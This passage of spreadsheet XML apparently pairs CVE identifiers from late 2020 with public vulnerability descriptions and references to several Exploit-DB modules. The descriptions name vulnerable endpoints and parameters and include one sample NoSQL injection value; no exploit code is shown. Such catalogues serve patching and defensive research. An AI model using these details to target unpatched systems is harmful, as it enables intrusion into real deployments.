    <t>A vulnerability in the FTP inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass FTP inspection. The vulnerability is due to ineffective flow tracking of FTP traffic. An attacker could exploit this vulnerability by sending crafted FTP traffic through an affected device. A successful exploit could allow the attacker to bypass FTP inspection and successfully complete FTP connections.</t>
  </si>
  <si>
    <t>CVE-2020-3565</t>
  </si>
  <si>
    <t>A vulnerability in the TCP Intercept functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured Access Control Policies (including Geolocation) and Service Polices on an affected system. The vulnerability exists because TCP Intercept is invoked when the embryonic connection limit is reached, which can cause the underlying detection engine to process the packet incorrectly. An attacker could exploit this vulnerability by sending a crafted stream of traffic that matches a policy on which TCP Intercept is configured. A successful exploit could allow the attacker to match on an incorrect policy, which could allow the traffic to be forwarded when it should be dropped. In addition, the traffic could incorrectly be dropped.</t>
  </si>
  <si>
    <t>CVE-2020-35650</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities in Uncanny Groups for LearnDash before v3.7 allow authenticated remote attackers to inject arbitrary JavaScript or HTML via the ulgm_code_redeem POST Parameter in user-code-redemption.php, the ulgm_user_first POST Parameter in user-registration-form.php, the ulgm_user_last POST Parameter in user-registration-form.php, the ulgm_user_email POST Parameter in user-registration-form.php, the ulgm_code_registration POST Parameter in user-registration-form.php, the ulgm_terms_conditions POST Parameter in user-registration-form.php, the _ulgm_total_seats POST Parameter in frontend-uo_groups_buy_courses.php, the uncanny_group_signup_user_first POST Parameter in group-registration-form.php, the uncanny_group_signup_user_last POST Parameter in group-registration-form.php, the uncanny_group_signup_user_login POST Parameter in group-registration-form.php, the uncanny_group_signup_user_email POST Parameter in group-registration-form.php, the success-invited GET Parameter in frontend-uo_groups.php, the bulk-errors GET Parameter in frontend-uo_groups.php, or the message GET Parameter in frontend-uo_groups.php.</t>
  </si>
  <si>
    <t>CVE-2020-35652</t>
  </si>
  <si>
    <t>An issue was discovered in res_pjsip_diversion.c in Sangoma Asterisk before 13.38.0, 14.x through 16.x before 16.15.0, 17.x before 17.9.0, and 18.x before 18.1.0. A crash can occur when a SIP message is received with a History-Info header that contains a tel-uri, or when a SIP 181 response is received that contains a tel-uri in the Diversion header.</t>
  </si>
  <si>
    <t>CVE-2020-35653</t>
  </si>
  <si>
    <t>In Pillow before 8.1.0, PcxDecode has a buffer over-read when decoding a crafted PCX file because the user-supplied stride value is trusted for buffer calculations.</t>
  </si>
  <si>
    <t>CVE-2020-35654</t>
  </si>
  <si>
    <t>In Pillow before 8.1.0, TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode.</t>
  </si>
  <si>
    <t>CVE-2020-35655</t>
  </si>
  <si>
    <t>In Pillow before 8.1.0, SGIRleDecode has a 4-byte buffer over-read when decoding crafted SGI RLE image files because offsets and length tables are mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-35656</t>
  </si>
  <si>
    <t>Jaws through 1.8.0 allows remote authenticated administrators to execute arbitrary code via crafted use of admin.php?reqGadget=Components&amp;reqAction=InstallGadget&amp;comp=FileBrowser and admin.php?reqGadget=FileBrowser&amp;reqAction=Files to upload a .php file. NOTE: this is unrelated to the JAWS (aka Job Access With Speech) product.</t>
  </si>
  <si>
    <t>CVE-2020-35657</t>
  </si>
  <si>
    <t>Jaws through 1.8.0 allows remote authenticated administrators to execute arbitrary code via crafted use of UploadTheme to upload a theme ZIP archive containing a .php file that is able to execute OS commands. NOTE: this is unrelated to the JAWS (aka Job Access With Speech) product.</t>
  </si>
  <si>
    <t>CVE-2020-35658</t>
  </si>
  <si>
    <t>SpamTitan before 7.09 allows attackers to tamper with backups, because backups are not encrypted.</t>
  </si>
  <si>
    <t>CVE-2020-35659</t>
  </si>
  <si>
    <t>The DNS query log in Pi-hole before 5.2.2 is vulnerable to stored XSS. An attacker with the ability to directly or indirectly query DNS with a malicious hostname can cause arbitrary JavaScript to execute when the Pi-hole administrator visits the Query Log or Long-term data Query Log page.</t>
  </si>
  <si>
    <t>CVE-2020-3566</t>
  </si>
  <si>
    <t>A vulnerability in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to exhaust process memory of an affected device. The vulnerability is due to insufficient queue management for Internet Group Management Protocol (IGMP) packets. An attacker could exploit this vulnerability by sending crafted IGMP traffic to an affected device. A successful exploit could allow the attacker to cause memory exhaustion, resulting in instability of other processes. These processes may include, but are not limited to, interior and exterior routing protocols. Cisco will release software updates that address this vulnerability.</t>
  </si>
  <si>
    <t>exploits/linux/webapps/49330.rb</t>
  </si>
  <si>
    <t>TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)</t>
  </si>
  <si>
    <t>2020-12-23</t>
  </si>
  <si>
    <t>CVE-2020-35660</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Monica before 2.19.1 via the journal page.</t>
  </si>
  <si>
    <t>CVE-2020-35662</t>
  </si>
  <si>
    <t>In SaltStack Salt before 3002.5, when authenticating to services using certain modules, the SSL certificate is not always validated.</t>
  </si>
  <si>
    <t>CVE-2020-35664</t>
  </si>
  <si>
    <t>An issue was discovered in Acronis Cyber Protect before 15 Update 1 build 26172. There is cross-site scripting (XSS) in the console.</t>
  </si>
  <si>
    <t>CVE-2020-35665</t>
  </si>
  <si>
    <t>An unauthenticated command-execution vulnerability exists in TerraMaster TOS through 4.2.06 via shell metacharacters in the Event parameter in include/makecvs.php during CSV creation.</t>
  </si>
  <si>
    <t>CVE-2020-35666</t>
  </si>
  <si>
    <t>Steedos Platform through 1.21.24 allows NoSQL injection because the /api/collection/findone implementation in server/packages/steedos_base.js mishandles req.body validation, as demonstrated by MongoDB operator attacks such as an X-User-Id[$ne]=1 value.</t>
  </si>
  <si>
    <t>CVE-2020-35667</t>
  </si>
  <si>
    <t>JetBrains TeamCity Plugin before 2020.2.85695 SSRF. Vulnerability that could potentially expose user credentials.</t>
  </si>
  <si>
    <t>CVE-2020-35668</t>
  </si>
  <si>
    <t>RedisGraph 2.x through 2.2.11 has a NULL Pointer Dereference that leads to a server crash because it mishandles an unquoted string, such as an alias that has not yet been introduced.</t>
  </si>
  <si>
    <t>CVE-2020-35669</t>
  </si>
  <si>
    <t>An issue was discovered in the http package through 0.12.2 for Dart. If the attacker controls the HTTP method and the app is using Request directly, it's possible to achieve CRLF injection in an HTTP request.</t>
  </si>
  <si>
    <t>CVE-2020-3567</t>
  </si>
  <si>
    <t>A vulnerability in the management REST API of Cisco Industrial Network Director (IND) could allow an authenticated, remote attacker to cause the CPU utilization to increase to 100 percent, resulting in a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient validation of requests sent to the REST API. An attacker could exploit this vulnerability by sending a crafted request to the REST API. A successful exploit could allow the attacker to cause a permanent DoS condition that is due to high CPU utilization. Manual intervention may be required to recover the Cisco IND.</t>
  </si>
  <si>
    <t>CVE-2020-35674</t>
  </si>
  <si>
    <t>BigProf Online Invoicing System before 2.9 suffers from an unauthenticated SQL Injection found in /membership_passwordReset.php (the endpoint that is responsible for issuing self-service password resets). An unauthenticated attacker is able to send a request containing a crafted payload that can result in sensitive information being extracted from the database, eventually leading into an application takeover. This vulnerability was introduced as a result of the developer trying to roll their own sanitization implementation in order to allow the application to be used in legacy environments.</t>
  </si>
  <si>
    <t>CVE-2020-35675</t>
  </si>
  <si>
    <t>BigProf Online Invoicing System before 3.0 offers a functionality that allows an administrator to move the records of members across groups. The applicable endpoint (admin/pageTransferOwnership.php) lacks CSRF protection, resulting in an attacker being able to escalate their privileges to Administrator and effectively taking over the application.</t>
  </si>
  <si>
    <t>CVE-2020-35676</t>
  </si>
  <si>
    <t>BigProf Online Invoicing System before 3.1 fails to correctly sanitize an XSS payload when a user registers using the self-registration functionality. As such, an attacker can input a crafted payload that will execute upon the application's administrator browsing the registered users' list. Once the arbitrary Javascript is executed in the context of the admin, this will cause the attacker to gain administrative privileges, effectively leading into an application takeover. This affects app/membership_signup.php and app/admin/pageViewMembers.php.</t>
  </si>
  <si>
    <t>CVE-2020-35677</t>
  </si>
  <si>
    <t>BigProf Online Invoicing System before 4.0 fails to adequately sanitize fields for HTML characters upon an administrator using admin/pageEditGroup.php to create a new group, resulting in Stored XSS. The caveat here is that an attacker would need administrative privileges in order to create the payload. One might think this completely mitigates the privilege-escalation impact as there is only one high-privileged role. However, it was discovered that the endpoint responsible for creating the group lacks CSRF protection.</t>
  </si>
  <si>
    <t>CVE-2020-35678</t>
  </si>
  <si>
    <t>Autobahn|Python before 20.12.3 allows redirect header injection.</t>
  </si>
  <si>
    <t>CVE-2020-35679</t>
  </si>
  <si>
    <t>smtpd/table.c in OpenSMTPD before 6.8.0p1 lacks a certain regfree, which might allow attackers to trigger a "very significant" memory leak via messages to an instance that performs many regex lookups.</t>
  </si>
  <si>
    <t>CVE-2020-3568</t>
  </si>
  <si>
    <t>A vulnerability in the antispam protection mechanisms of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass the URL reputation filters on an affected device. The vulnerability is due to insufficient input validation of URLs. An attacker could exploit this vulnerability by crafting a URL in a particular way. A successful exploit could allow the attacker to bypass the URL reputation filters that are configured for the affected device, which could allow malicious URLs to pass through the device.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49426.html</t>
  </si>
  <si>
    <t>PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)</t>
  </si>
  <si>
    <t>2021-01-15</t>
  </si>
  <si>
    <t>CVE-2020-35680</t>
  </si>
  <si>
    <t>smtpd/lka_filter.c in OpenSMTPD before 6.8.0p1, in certain configurations, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted pattern of client activity, because the filter state machine does not properly maintain the I/O channel between the SMTP engine and the filters layer.</t>
  </si>
  <si>
    <t>CVE-2020-35681</t>
  </si>
  <si>
    <t>Django Channels 3.x before 3.0.3 allows remote attackers to obtain sensitive information from a different request scope. The legacy channels.http.AsgiHandler class, used for handling HTTP type requests in an ASGI environment prior to Django 3.0, did not correctly separate request scopes in Channels 3.0. In many cases this would result in a crash but, with correct timing, responses could be sent to the wrong client, resulting in potential leakage of session identifiers and other sensitive data. Note that this affects only the legacy Channels provided class, and not Django's similar ASGIHandler, available from Django 3.0.</t>
  </si>
  <si>
    <t>CVE-2020-35682</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus before 11134 allows an Authentication Bypass (only during SAML login).</t>
  </si>
  <si>
    <t>CVE-2020-35683</t>
  </si>
  <si>
    <t>An issue was discovered in HCC Nichestack 3.0. The code that parses ICMP packets relies on an unchecked value of the IP payload size (extracted from the IP header) to compute the ICMP checksum. When the IP payload size is set to be smaller than the size of the IP header, the ICMP checksum computation function may read out of bounds, causing a Denial-of-Service.</t>
  </si>
  <si>
    <t>CVE-2020-35684</t>
  </si>
  <si>
    <t>An issue was discovered in HCC Nichestack 3.0. The code that parses TCP packets relies on an unchecked value of the IP payload size (extracted from the IP header) to compute the length of the TCP payload within the TCP checksum computation function. When the IP payload size is set to be smaller than the size of the IP header, the TCP checksum computation function may read out of bounds (a low-impact write-out-of-bounds is also possible).</t>
  </si>
  <si>
    <t>CVE-2020-35685</t>
  </si>
  <si>
    <t>An issue was discovered in HCC Nichestack 3.0. The code that generates Initial Sequence Numbers (ISNs) for TCP connections derives the ISN from an insufficiently random source. As a result, an attacker may be able to determine the ISN of current and future TCP connections and either hijack existing ones or spoof future ones. (Proper ISN generation should aim to follow at least the specifications outlined in RFC 6528.)</t>
  </si>
  <si>
    <t>CVE-2020-35686</t>
  </si>
  <si>
    <t>The SECOMN service in Sound Research DCHU model software component modules (APO) through 2.0.9.17, delivered on HP Windows 10 computers, may allow escalation of privilege via a fake DLL. (As a resolution, Windows Update is being submitted for all affected products to update to 2.0.9.18 or later.)</t>
  </si>
  <si>
    <t>CVE-2020-35687</t>
  </si>
  <si>
    <t>PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim.</t>
  </si>
  <si>
    <t>CVE-2020-3569</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to either immediately crash the Internet Group Management Protocol (IGMP) process or make it consume available memory and eventually crash. The memory consumption may negatively impact other processes that are running on the device. These vulnerabilities are due to the incorrect handling of IGMP packets. An attacker could exploit these vulnerabilities by sending crafted IGMP traffic to an affected device. A successful exploit could allow the attacker to immediately crash the IGMP process or cause memory exhaustion, resulting in other processes becoming unstable. These processes may include, but are not limited to, interior and exterior routing protocols. Cisco will release software updates that address these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-35693</t>
  </si>
  <si>
    <t>On some Samsung phones and tablets running Android through 7.1.1, it is possible for an attacker-controlled Bluetooth Low Energy (BLE) device to pair silently with a vulnerable target device, without any user interaction, when the target device's Bluetooth is on, and it is running an app that offers a connectable BLE advertisement. An example of such an app could be a Bluetooth-based contact tracing app, such as Australia's COVIDSafe app, Singapore's TraceTogether app, or France's TousAntiCovid (formerly StopCovid). As part of the pairing process, two pieces (among others) of personally identifiable information are exchanged: the Identity Address of the Bluetooth adapter of the target device, and its associated Identity Resolving Key (IRK). Either one of these identifiers can be used to perform re-identification of the target device for long term tracking. The list of affected devices includes (but is not limited to): Galaxy Note 5, Galaxy S6 Edge, Galaxy A3, Tab A (2017), J2 Pro (2018), Galaxy Note 4, and Galaxy S5.</t>
  </si>
  <si>
    <t>CVE-2020-35700</t>
  </si>
  <si>
    <t>A second-order SQL injection issue in Widgets/TopDevicesController.php (aka the Top Devices dashboard widget) of LibreNMS before 21.1.0 allows remote authenticated attackers to execute arbitrary SQL commands via the sort_order parameter against the /ajax/form/widget-settings endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-35701</t>
  </si>
  <si>
    <t>An issue was discovered in Cacti 1.2.x through 1.2.16. A SQL injection vulnerability in data_debug.php allows remote authenticated attackers to execute arbitrary SQL commands via the site_id parameter. This can lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-35702</t>
  </si>
  <si>
    <t>** DISPUTED ** DCTStream::getChars in DCTStream.cc in Poppler 20.12.1 has a heap-based buffer overflow via a crafted PDF document. NOTE: later reports indicate that this only affects builds from Poppler git clones in late December 2020, not the 20.12.1 release. In this situation, it should NOT be considered a Poppler vulnerability. However, several third-party Open Source projects directly rely on Poppler git clones made at arbitrary times, and therefore the CVE remains useful to users of those projects.</t>
  </si>
  <si>
    <t>CVE-2020-35704</t>
  </si>
  <si>
    <t>Daybyday 2.1.0 allows stored XSS via the Title parameter to the New Lead screen.</t>
  </si>
  <si>
    <t>CVE-2020-35705</t>
  </si>
  <si>
    <t>Daybyday 2.1.0 allows stored XSS via the Name parameter to the New User screen.</t>
  </si>
  <si>
    <t>CVE-2020-35706</t>
  </si>
  <si>
    <t>Daybyday 2.1.0 allows stored XSS via the Title parameter to the New Project screen.</t>
  </si>
  <si>
    <t>CVE-2020-35707</t>
  </si>
  <si>
    <t>Daybyday 2.1.0 allows stored XSS via the Company Name parameter to the New Client screen.</t>
  </si>
  <si>
    <t>CVE-2020-35708</t>
  </si>
  <si>
    <t>phpList 3.5.9 allows SQL injection by admins who provide a crafted fourth line of a file to the "Config - Import Administrators" page.</t>
  </si>
  <si>
    <t>CVE-2020-35709</t>
  </si>
  <si>
    <t>bloofoxCMS 0.5.2.1 allows admins to upload arbitrary .php files (with "Content-Type: application/octet-stream") to ../media/images/ via the admin/index.php?mode=tools&amp;page=upload URI, aka directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-3571</t>
  </si>
  <si>
    <t>A vulnerability in the ICMP ingress packet processing of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 4110 appliances could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to incomplete input validation upon receiving ICMP packets. An attacker could exploit this vulnerability by sending a high number of crafted ICMP or ICMPv6 packets to an affected device. A successful exploit could allow the attacker to cause a memory exhaustion condition that may result in an unexpected reload. No manual intervention is needed to recover the device after the reload.</t>
  </si>
  <si>
    <t>CVE-2020-35710</t>
  </si>
  <si>
    <t>Parallels Remote Application Server (RAS) 18 allows remote attackers to discover an intranet IP address because submission of the login form (even with blank credentials) provides this address to the attacker's client for use as a "host" value. In other words, after an attacker's web browser sent a request to the login form, it would automatically send a second request to a RASHTML5Gateway/socket.io URI with something like "host":"192.168.###.###" in the POST data.</t>
  </si>
  <si>
    <t>CVE-2020-35711</t>
  </si>
  <si>
    <t>An issue has been discovered in the arc-swap crate before 0.4.8 (and 1.x before 1.1.0) for Rust. Use of arc_swap::access::Map with the Constant test helper (or with a user-supplied implementation of the Access trait) could sometimes lead to dangling references being returned by the map.</t>
  </si>
  <si>
    <t>CVE-2020-35712</t>
  </si>
  <si>
    <t>Esri ArcGIS Server before 10.8 is vulnerable to SSRF in some configurations.</t>
  </si>
  <si>
    <t>CVE-2020-35713</t>
  </si>
  <si>
    <t>Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.</t>
  </si>
  <si>
    <t>CVE-2020-35714</t>
  </si>
  <si>
    <t>Belkin LINKSYS RE6500 devices before 1.0.11.001 allow remote authenticated users to execute arbitrary commands via goform/systemCommand?command= in conjunction with the goform/pingstart program.</t>
  </si>
  <si>
    <t>CVE-2020-35715</t>
  </si>
  <si>
    <t>Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote authenticated users to execute arbitrary commands via shell metacharacters in a filename to the upload_settings.cgi page.</t>
  </si>
  <si>
    <t>CVE-2020-35716</t>
  </si>
  <si>
    <t>Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to cause a persistent denial of service (segmentation fault) via a long /goform/langSwitch langSelectionOnly parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35717</t>
  </si>
  <si>
    <t>zonote through 0.4.0 allows XSS via a crafted note, with resultant Remote Code Execution (because nodeIntegration in webPreferences is true).</t>
  </si>
  <si>
    <t>CVE-2020-35719</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the /WebCM/Applications/Search/index.jsp file via the added parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-3572</t>
  </si>
  <si>
    <t>A vulnerability in the SSL/TLS session handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory leak when closing SSL/TLS connections in a specific state. An attacker could exploit this vulnerability by establishing several SSL/TLS sessions and ensuring they are closed under certain conditions. A successful exploit could allow the attacker to exhaust memory resources in the affected device, which would prevent it from processing new SSL/TLS connections, resulting in a DoS. Manual intervention is required to recover an affected device.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49474.rb</t>
  </si>
  <si>
    <t>Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)</t>
  </si>
  <si>
    <t>2021-01-25</t>
  </si>
  <si>
    <t>CVE-2020-35720</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Stored XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to store malicious code in multiple fields (first name, last name, and logon name) when creating or modifying a user via the submitUser.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35721</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the BrowseAssets.do file via the title parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35722</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** CSRF in Web Compliance Manager in Quest Policy Authority 8.1.2.200 allows remote attackers to force user modification/creation via a specially crafted link to the submitUser.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35723</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the ReportPreview.do file via the referer parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35724</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the Error.jsp file via the err parameter (or indirectly via the cpr, tcp, or abs parameter). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35725</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the /WebCM/index.jsp file via the msg parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35726</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the /WebCM/Applications/Reports/index.jsp file via the by parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35727</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Reflected XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to inject malicious code into the browser via a specially crafted link to the BrowseDirs.do file via the title parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35728</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).</t>
  </si>
  <si>
    <t>CVE-2020-35729</t>
  </si>
  <si>
    <t>KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.</t>
  </si>
  <si>
    <t>CVE-2020-3573</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49378.txt</t>
  </si>
  <si>
    <t>Newgen Correspondence Management System (corms) eGov 12.0 - IDOR</t>
  </si>
  <si>
    <t>2021-01-06</t>
  </si>
  <si>
    <t>CVE-2020-35730</t>
  </si>
  <si>
    <t>An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16, and 1.4.x before 1.4.10. The attacker can send a plain text e-mail message, with JavaScript in a link reference element that is mishandled by linkref_addindex in rcube_string_replacer.php.</t>
  </si>
  <si>
    <t>CVE-2020-35733</t>
  </si>
  <si>
    <t>An issue was discovered in Erlang/OTP before 23.2.2. The ssl application 10.2 accepts and trusts an invalid X.509 certificate chain to a trusted root Certification Authority.</t>
  </si>
  <si>
    <t>CVE-2020-35734</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must login to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-35735</t>
  </si>
  <si>
    <t>Vidyo 02-09-/D allows clickjacking via the portal/ URI.</t>
  </si>
  <si>
    <t>CVE-2020-35736</t>
  </si>
  <si>
    <t>GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused.</t>
  </si>
  <si>
    <t>CVE-2020-35737</t>
  </si>
  <si>
    <t>In Correspondence Management System (corms) in Newgen eGov 12.0, an attacker can modify other users' profile information by manipulating the unvalidated UserIndex parameter, aka Insecure Direct Object Reference.</t>
  </si>
  <si>
    <t>CVE-2020-35738</t>
  </si>
  <si>
    <t>WavPack 5.3.0 has an out-of-bounds write in WavpackPackSamples in pack_utils.c because of an integer overflow in a malloc argument. NOTE: some third-parties claim that there are later "unofficial" releases through 5.3.2, which are also affected.</t>
  </si>
  <si>
    <t>CVE-2020-3574</t>
  </si>
  <si>
    <t>A vulnerability in the TCP packet processing functionality of Cisco IP Phones could allow an unauthenticated, remote attacker to cause the phone to stop responding to incoming calls, drop connected calls, or unexpectedly reload. The vulnerability is due to insufficient TCP ingress packet rate limiting. An attacker could exploit this vulnerability by sending a high and sustained rate of crafted TCP traffic to the targeted device. A successful exploit could allow the attacker to impact operations of the phone or cause the phone to reload, leading to a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50721.py</t>
  </si>
  <si>
    <t>Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion</t>
  </si>
  <si>
    <t>CVE-2020-35740</t>
  </si>
  <si>
    <t>HGiga MailSherlock does not validate specific URL parameters properly that allows attackers to inject JavaScript syntax for XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-35741</t>
  </si>
  <si>
    <t>HGiga MailSherlock does not validate user parameters on multiple login pages. Attackers can use the vulnerability to inject JavaScript syntax for XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-35742</t>
  </si>
  <si>
    <t>HGiga MailSherlock contains a vulnerability of SQL Injection. Attackers can inject and launch SQL commands in a URL parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35743</t>
  </si>
  <si>
    <t>HGiga MailSherlock contains a SQL injection flaw. Attackers can inject and launch SQL commands in a URL parameter of specific cgi pages.</t>
  </si>
  <si>
    <t>CVE-2020-35745</t>
  </si>
  <si>
    <t>PHPGURUKUL Hospital Management System V 4.0 does not properly restrict access to admin/dashboard.php, which allows attackers to access all data of users, doctors, patients, change admin password, get appointment history and access all session logs.</t>
  </si>
  <si>
    <t>CVE-2020-35748</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in models/list-table.php in the FV Flowplayer Video Player plugin before 7.4.37.727 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the fv_wp_fvvideoplayer_src JSON field in the data parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35749</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in class-simple_job_board_resume_download_handler.php in the Simple Board Job plugin 2.9.3 and earlier for WordPress allows remote attackers to read arbitrary files via the sjb_file parameter to wp-admin/post.php.</t>
  </si>
  <si>
    <t>CVE-2020-35752</t>
  </si>
  <si>
    <t>Baby Care System 1.0 is affected by a cross-site scripting (XSS) vulnerability in the Edit Page tab through the Post title parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35753</t>
  </si>
  <si>
    <t>The job posting recommendation form in Persis Human Resource Management Portal (Versions 17.2.00 through 17.2.35 and 19.0.00 through 19.0.20), when the "Recommend job posting" function is enabled, allows XSS via the SENDER parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35754</t>
  </si>
  <si>
    <t>OpenSolution Quick.CMS &lt; 6.7 and Quick.Cart &lt; 6.7 allow an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Language tab.</t>
  </si>
  <si>
    <t>CVE-2020-35755</t>
  </si>
  <si>
    <t>An issue was discovered on Libre Wireless LS9 LS1.5/p7040 devices. There is a luci_service Read_ NVRAM Direct Access Information Leak. The luci_service deamon running on port 7777 provides a sub-category of commands for which Read_ is prepended. Commands in this category are able to directly read the contents of the device configuration NVRAM. The NVRAM contains sensitive information, such as the Wi-Fi password (in cleartext), as well as connected account tokens for services such as Spotify.</t>
  </si>
  <si>
    <t>CVE-2020-35756</t>
  </si>
  <si>
    <t>An issue was discovered on Libre Wireless LS9 LS1.5/p7040 devices. There is a luci_service GETPASS Configuration Password Information Leak. The luci_service daemon running on port 7777 does not require authentication to return the device configuration password in cleartext when using the GETPASS command. As such, any unauthenticated person with access to port 7777 on the device will be able to leak the user's personal device configuration password by issuing the GETPASS command.</t>
  </si>
  <si>
    <t>CVE-2020-35757</t>
  </si>
  <si>
    <t>An issue was discovered on Libre Wireless LS9 LS1.5/p7040 devices. There is Unauthenticated Root ADB Access Over TCP. The LS9 web interface provides functionality to access ADB over TCP. This is not enabled by default, but can be enabled by sending a crafted request to a web management interface endpoint. Requests made to this endpoint do not require authentication. As such, any unauthenticated user who is able to access the web interface will be able to gain root privileges on the LS9 module.</t>
  </si>
  <si>
    <t>CVE-2020-35758</t>
  </si>
  <si>
    <t>An issue was discovered on Libre Wireless LS9 LS1.5/p7040 devices. There is a Authentication Bypass in the Web Interface. This interface does not properly restrict access to internal functionality. Despite presenting a password login page on first access, authentication is not required to access privileged functionality. As such, it's possible to directly access APIs that should not be exposed to an unauthenticated user.</t>
  </si>
  <si>
